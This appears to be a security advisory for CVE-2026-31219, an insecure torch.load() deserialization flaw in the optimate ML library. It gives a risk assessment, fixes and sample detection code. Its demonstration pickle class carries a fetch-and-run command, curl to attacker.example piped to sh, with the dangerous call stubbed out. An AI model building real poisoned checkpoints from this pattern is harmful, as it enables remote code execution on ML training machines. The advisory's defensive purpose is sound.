CVE-2026-31219: optimate: RCE via unsafe torch.load() deserialization
The nebuly-ai optimate ML optimization library loads model files using torch.load() without the weights_only=True safeguard, allowing arbitrary code execution when a user processes a maliciously crafted .pt or .pth file. This is a classic pickle deserialization vulnerability in a training pipeline context—any data scientist or MLOps engineer who downloads and loads an external model checkpoint is at risk of full system compromise with the privileges of the training process. No CVSS score has been formally assigned yet, no public exploits are available, and the package is not in CISA KEV, but pickle-based RCE is trivial to weaponize once the delivery mechanism is in place; training machines commonly hold cloud IAM credentials, dataset access, and MLOps pipeline permissions, making the blast radius significant despite the niche package. Teams using optimate should patch _load_model() to pass weights_only=True or migrate model storage to safetensors format, which eliminates pickle deserialization entirely.
Risk Assessment
Medium-high risk for organizations using optimate in ML training workflows. Exploitation requires delivering a malicious model file to a victim who then loads it via the --model CLI argument—a realistic vector in ML environments where pre-trained checkpoints are routinely shared via GitHub, Hugging Face, or internal registries. The attack requires no privileges on the target system and delivers full RCE; once formally scored this will likely land HIGH or CRITICAL on CVSS. The blast radius is constrained by optimate's niche adoption, but organizations running active model experimentation with external checkpoints are directly exposed, and training machines are high-value targets due to their broad access to data, credentials, and cloud infrastructure.
Recommended Action
1) Patch: update _load_model() in neural_magic_training.py to call torch.load(path, weights_only=True), restricting deserialization to safe tensor primitives.
2) Migrate: transition model storage to the safetensors format, which eliminates pickle deserialization entirely and is the recommended long-term fix for any PyTorch model loading workflow.
3) Validate: implement model file integrity checks (cryptographic hash verification against a trusted manifest) before loading any external checkpoint.
4) Isolate: run training workloads in containers with minimal filesystem permissions, no outbound internet access, and scoped IAM roles to limit the blast radius if exploitation occurs.
5) Detect: monitor for anomalous process spawning from Python interpreter processes during model loading phases; unexpected network connections or child process creation are IOCs for pickle payload execution.
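Step 3 can be sketched in a few lines of stdlib Python. The function name, manifest format, and file names below are illustrative, not part of optimate:

```python
import hashlib
from pathlib import Path


def verify_checkpoint(path: str, trusted_manifest: dict) -> bool:
    """Return True only if the checkpoint's SHA-256 digest matches the
    trusted manifest: a mapping of file name -> expected hex digest,
    distributed and ideally signed out of band."""
    p = Path(path)
    expected = trusted_manifest.get(p.name)
    if expected is None:
        return False  # unknown checkpoint: refuse to load it
    digest = hashlib.sha256(p.read_bytes()).hexdigest()
    return digest == expected
```

Only hand the path to torch.load() after verify_checkpoint() returns True; an unverified file should never reach the deserializer.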
Frequently Asked Questions
What is CVE-2026-31219?
The nebuly-ai optimate ML optimization library loads model files using torch.load() without the weights_only=True safeguard, allowing arbitrary code execution when a user processes a maliciously crafted .pt or .pth file. This is a classic pickle deserialization vulnerability in a training pipeline context—any data scientist or MLOps engineer who downloads and loads an external model checkpoint is at risk of full system compromise with the privileges of the training process. No CVSS score has been formally assigned yet, no public exploits are available, and the package is not in CISA KEV, but pickle-based RCE is trivial to weaponize once the delivery mechanism is in place; training machines commonly hold cloud IAM credentials, dataset access, and MLOps pipeline permissions, making the blast radius significant despite the niche package. Teams using optimate should patch _load_model() to pass weights_only=True or migrate model storage to safetensors format, which eliminates pickle deserialization entirely.
Is CVE-2026-31219 actively exploited?
No confirmed active exploitation of CVE-2026-31219 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-31219?
1) Patch: update _load_model() in neural_magic_training.py to call torch.load(path, weights_only=True), restricting deserialization to safe tensor primitives.
2) Migrate: transition model storage to the safetensors format, which eliminates pickle deserialization entirely and is the recommended long-term fix for any PyTorch model loading workflow.
3) Validate: implement model file integrity checks (cryptographic hash verification against a trusted manifest) before loading any external checkpoint.
4) Isolate: run training workloads in containers with minimal filesystem permissions, no outbound internet access, and scoped IAM roles to limit the blast radius if exploitation occurs.
5) Detect: monitor for anomalous process spawning from Python interpreter processes during model loading phases; unexpected network connections or child process creation are IOCs for pickle payload execution.
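The detection guidance in step 5 can be prototyped in-process with CPython's audit hooks (PEP 578). The event names below are real CPython audit events; the in-memory alert list is a stand-in for a proper logging or EDR pipeline:

```python
import sys

# Audit events a pickle payload typically triggers; legitimate tensor
# deserialization fires none of these.
SUSPICIOUS_PREFIXES = ("subprocess.Popen", "os.system", "os.exec", "socket.connect")
ALERTS: list = []


def checkpoint_audit_hook(event: str, args: tuple) -> None:
    """Record any process-spawn or network audit event (PEP 578)."""
    if event.startswith(SUSPICIOUS_PREFIXES):
        ALERTS.append(event)


# Note: audit hooks cannot be removed once installed.
sys.addaudithook(checkpoint_audit_hook)
```

If ALERTS is non-empty after a checkpoint-loading call, the file did something no model weights should ever do.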
What systems are affected by CVE-2026-31219?
This vulnerability affects the following AI/ML architecture patterns: ML training pipelines, model fine-tuning workflows, neural network optimization pipelines, and MLOps experiment tracking environments.
What is the CVSS score for CVE-2026-31219?
No CVSS score has been assigned yet.
Technical Details
NVD Description
The _load_model() function in the neural_magic_training.py script of the optimate project in commit a6d302f912b481c94370811af6b11402f51d377f (2024-07-21) is vulnerable to insecure deserialization (CWE-502). When a user provides a single model file path (e.g., .pt or .pth) via the --model command-line argument, the function loads the file using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects through the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution during deserialization on the victim's system.
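The weights_only=True parameter works by restricting which globals the unpickler may resolve. A minimal stdlib analogue of that idea is sketched below; where torch allows an allowlist of tensor-related types, this sketch permits no globals at all, so only primitive containers deserialize:

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuse to resolve any global during unpickling.

    torch.load(weights_only=True) applies the same principle with an
    allowlist of tensor-related types; this stdlib sketch allows none,
    so only dicts, lists, numbers, and strings can deserialize.
    """

    def find_class(self, module: str, name: str):
        raise pickle.UnpicklingError(
            f"blocked global {module}.{name} during deserialization"
        )


def restricted_loads(data: bytes):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()
```

Any payload that names a callable (the core of a pickle exploit) is rejected before it runs, while plain data structures load normally.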
Exploitation Scenario
An adversary crafts a malicious PyTorch .pth file containing an embedded pickle payload—for example, a reverse shell to an attacker-controlled server. The file is disguised as a legitimate Neural Magic pre-trained model checkpoint and distributed via a public GitHub release, a compromised model registry, or a spearphishing email targeting a data scientist. When the victim runs the optimate training script with --model path/to/malicious.pth, torch.load() invokes Python's pickle deserializer without restriction, executing the attacker's code with the full privileges of the training process. The attacker gains a shell on a machine that typically has direct access to cloud storage buckets, MLflow or W&B experiment logs, and IAM credentials for cloud GPU provisioning.
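The mechanics can be reproduced safely with the stdlib: __reduce__ lets a serialized object name any callable for the pickle VM to invoke at load time. This benign stand-in appends to a list where a real payload would call os.system:

```python
import pickle

EXECUTED: list = []


def attacker_code(cmd: str) -> None:
    """Benign stand-in; a real payload would run os.system(cmd)."""
    EXECUTED.append(cmd)


class MaliciousCheckpoint:
    """Mimics a poisoned .pth file: __reduce__ tells the pickle VM which
    callable to invoke, with which arguments, during deserialization."""

    def __reduce__(self):
        return (attacker_code, ("curl https://attacker.example/shell.sh | sh",))


blob = pickle.dumps(MaliciousCheckpoint())  # the "model file" on disk
pickle.loads(blob)                          # the victim merely loads it
# EXECUTED now holds the attacker's command: no method call was needed.
```

This is why hash verification and weights_only=True must happen before or during loading; by the time torch.load() returns, the payload has already run.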
Related Vulnerabilities
CVE-2025-59528 (CVSS 10.0) Flowise: Unauthenticated RCE via MCP config injection. Same attack type: Supply Chain
CVE-2024-2912 (CVSS 10.0) BentoML: RCE via insecure deserialization. Same attack type: Supply Chain
CVE-2023-3765 (CVSS 10.0) MLflow: path traversal allows arbitrary file read. Same attack type: Supply Chain
CVE-2025-5120 (CVSS 10.0) smolagents: sandbox escape enables unauthenticated RCE. Same attack type: Supply Chain
CVE-2026-21858 (CVSS 10.0) n8n: Input Validation flaw enables exploitation. Same attack type: Code Execution